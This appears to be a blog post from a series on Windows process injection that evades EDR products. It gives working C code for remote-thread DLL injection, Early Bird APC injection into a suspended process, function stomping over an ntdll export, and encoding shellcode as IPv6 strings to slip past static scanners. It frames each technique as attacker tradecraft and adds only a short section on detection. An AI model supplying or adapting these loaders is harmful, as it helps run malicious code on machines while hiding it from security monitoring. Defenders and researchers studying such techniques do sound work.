Process Injection Without the Obvious Thread: Early Bird APC and Beyond

The first process injection code most people write looks something like this:

c
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, targetPid);
LPVOID pMem = VirtualAllocEx(hProcess, NULL, dllPathLen, MEM_COMMIT, PAGE_READWRITE);
WriteProcessMemory(hProcess, pMem, dllPath, dllPathLen, NULL);
HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0,
    (LPTHREAD_START_ROUTINE)GetProcAddress(
        GetModuleHandleA("kernel32.dll"), "LoadLibraryA"),
    pMem, 0, NULL);
WaitForSingleObject(hThread, INFINITE);

It works. On a machine with nothing watching, it will happily inject your DLL into any process you have a handle to. On a machine with an EDR, this is roughly equivalent to holding up a sign that says “I AM DOING INJECTION RIGHT NOW.”

Every step in that sequence generates telemetry. The OpenProcess call with PROCESS_ALL_ACCESS fires a kernel callback. VirtualAllocEx with MEM_COMMIT | PAGE_READWRITE in a remote process is flagged. WriteProcessMemory across processes is logged. CreateRemoteThread fires PsSetCreateThreadNotifyRoutine callbacks on every registered driver — including every EDR on the market, which absolutely registers one. The LoadLibraryA target address and the DLL path in the remote process’s memory are both suspicious. There is not a single step that a competent EDR misses.

The question is what you do about it.

The thread creation problem

The most noticeable signal is the remote thread. Thread creation in another process is unusual enough that it’s worth flagging on its own — not many legitimate programs do it. The kernel notifies every registered driver synchronously via PsSetCreateThreadNotifyRoutine before the thread starts executing. The EDR gets to see the new thread, scan the memory it’s about to run, and decide whether to allow it.

If your injected code is in a freshly-allocated PAGE_EXECUTE_READWRITE region, the EDR sees exactly what you’re doing. If it’s in a region that was executable before (like a code section you stomped), that’s less obviously malicious — but now you’ve modified existing memory in a signed module, which is its own problem.

The other issue with CreateRemoteThread is that it’s a blunt instrument. You create a thread, it runs your code, it exits. The thread’s brief existence is visible in process explorers, ETW traces, and any monitoring that watches the thread list.

Early Bird APC

APCs (Asynchronous Procedure Calls) are a kernel mechanism for queuing deferred work to a thread. When a thread enters an alertable wait, pending APCs drain — the thread executes each queued APC function before continuing its wait. This is used legitimately for async I/O completion.

The Early Bird technique uses this differently. Instead of creating a thread in the target, you create a new process in suspended state and queue an APC to its main thread before it ever runs:

c
STARTUPINFOA si = { sizeof(si) };
PROCESS_INFORMATION pi = {};

// Create suspended — main thread exists but hasn't run yet
CreateProcessA(NULL, "C:\\Windows\\System32\\notepad.exe",
    NULL, NULL, FALSE,
    CREATE_SUSPENDED, NULL, NULL, &si, &pi);

// Allocate shellcode in the new process
LPVOID pShellcode = VirtualAllocEx(pi.hProcess, NULL,
    shellcodeLen, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(pi.hProcess, pShellcode,
    shellcode, shellcodeLen, NULL);

// Queue an APC to the main thread pointing at our shellcode
QueueUserAPC((PAPCFUNC)pShellcode, pi.hThread, 0);

// Resume — the APC drains before the process entry point runs
ResumeThread(pi.hThread);

CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);

The key difference: QueueUserAPC does not create a thread. The APC runs in the existing thread context — the main thread of the new process — before that thread’s normal execution path starts. When ResumeThread fires, the scheduler picks up the thread, sees a pending APC, and drains it. Your shellcode runs. Then the main thread continues to the process entry point, which never sees anything unusual.

There’s no CreateRemoteThread call. No remote thread creation notification fires. The new process runs your code as a side-effect of its normal startup sequence. EDRs that watch purely for remote thread creation miss this entirely. Those that watch APC queues catch it, but the signal is subtler — legitimate programs do queue APCs, just not to freshly-created processes with shellcode in their memory.

The tradecraft improvement matters. The fundamental visibility problem — shellcode in a freshly-allocated RWX region — remains. That’s a separate concern.

Function stomping

One approach to the “suspicious new allocation” problem: don’t allocate new memory. Instead, stomp an existing function in the target process.

Find a function that’s large enough to hold your shellcode and that the target process is unlikely to call during your operation window. Write your shellcode over it. Execute it (via APC or any other trigger). Clean up — restore original bytes afterward if you need the process to survive.

c
// Find a suitable function in the target — something large enough,
// unlikely to be called during execution
LPVOID pTarget = GetProcAddress(
    GetModuleHandleA("ntdll.dll"), "NtSetSystemInformation");
// pTarget is in ntdll's .text section, already executable, not RWX

// Make it writable — or use WriteProcessMemory directly
// (WriteProcessMemory doesn't require the target to be writable;
//  the kernel handles the page permissions for cross-process writes)
WriteProcessMemory(hProcess, pTarget,
    shellcode, shellcodeLen, NULL);

QueueUserAPC((PAPCFUNC)pTarget, hThread, 0);

The advantage: the shellcode occupies an address that was already executable, already in a legitimate module’s address range. No new PAGE_EXECUTE_READWRITE allocation appears in the process’s memory map. A scanner looking for “RWX regions” or “executable regions not backed by a file mapping” finds nothing.

The disadvantage: you’ve modified the text section of a loaded module. If anything in the target reads NtSetSystemInformation’s bytes for integrity checking — or actually calls it — you have a problem. And restoring original bytes after execution adds complexity.

Shellcode encoding: the IPv6 trick

One technique worth documenting is using Windows’s own API for shellcode storage. Instead of a buffer of raw bytes in the target, encode the shellcode as an array of IPv6 addresses, store them as strings, and decode them at runtime using RtlIpv6StringToAddressA.

Each IPv6 address is 16 bytes. Your shellcode gets split into 16-byte chunks and encoded as valid IPv6 address strings:

c
// Encoded shellcode as IPv6 addresses
const char *ipv6_chunks[] = {
    "fc48:83e4:f0e8:c000:0000:4151:4150:5251",
    "5648:31d2:6548:8b52:6048:8b52:1848:8b52",
    // ...
};

// Decode at runtime into an executable buffer
BYTE decoded[shellcodeLen];
for (int i = 0; i < chunkCount; i++) {
    SOCKADDR_IN6 addr = {};
    RtlIpv6StringToAddressA(ipv6_chunks[i],
        NULL, &addr.sin6_addr);
    memcpy(decoded + i * 16, &addr.sin6_addr, 16);
}

The shellcode never exists as a recognisable byte sequence in your loader binary — static scanners see IP address strings. The decode happens at runtime using a legitimate Windows networking API. This is primarily useful for static analysis evasion of the loader itself, not for hiding the shellcode once it’s been decoded and placed in memory.

The detection angle

All of these techniques reduce the telemetry surface, but they don’t eliminate it. Early Bird still requires allocating memory in the target, still requires OpenProcess with sufficient access, still triggers page allocation events that behavioural EDRs watch. Function stomping modifies module text sections, which HVCI and integrity monitoring detect. IPv6 encoding is a static evasion only — once the shellcode is executing, it’s executable memory that didn’t exist before.

The deeper evasion — making none of this visible at the kernel callback level — requires going below the kernel. If the callbacks that EDRs register via PsSetCreateThreadNotifyRoutine, PsSetCreateProcessNotifyRoutine, and PsSetLoadImageNotifyRoutine never fire, the EDR has no telemetry. That requires operating from a position where you control what the kernel sees, which is the domain of the hypervisor series. The EPT shadow hook approach from Part 3 lets you intercept the notification mechanism itself.

For anything running entirely in the guest, the detection surface is a matter of degree, not of kind.